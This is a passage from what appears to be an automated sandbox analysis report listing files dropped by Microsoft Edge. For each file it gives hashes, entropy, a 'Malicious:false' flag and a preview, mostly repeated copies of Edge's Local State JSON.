                                                                                                                                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                                        MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                                        SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                                        SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                                        SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:117.0.2045.55

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38780.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF387ee.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38a40.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b150.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3bb33.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3bcf8.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3bd65.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3e262.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.089767062962211
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWOdi1zNtPMdkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynG+kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                        MD5:2F47D889DDE8E9BA2FC5273F9A3D6A6F
                                                                                                                                                                                                                                                                                                                        SHA1:7AE25C45C8B713BF33D1228D23ECD28D72574217
                                                                                                                                                                                                                                                                                                                        SHA-256:79680B2CAB2462AF924C9CE1D1A461D2C019641C51EDEB58A7C6E1A0610CAC2E
                                                                                                                                                                                                                                                                                                                        SHA-512:1EA298F4564666B01ECA87A79E06AFD4A5D8B294CCD4BC5AEB43C15D2E7C038E64855C7C3992157891C4723BC50CDD3E476CBED3448F5874A50412E27B92B7BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
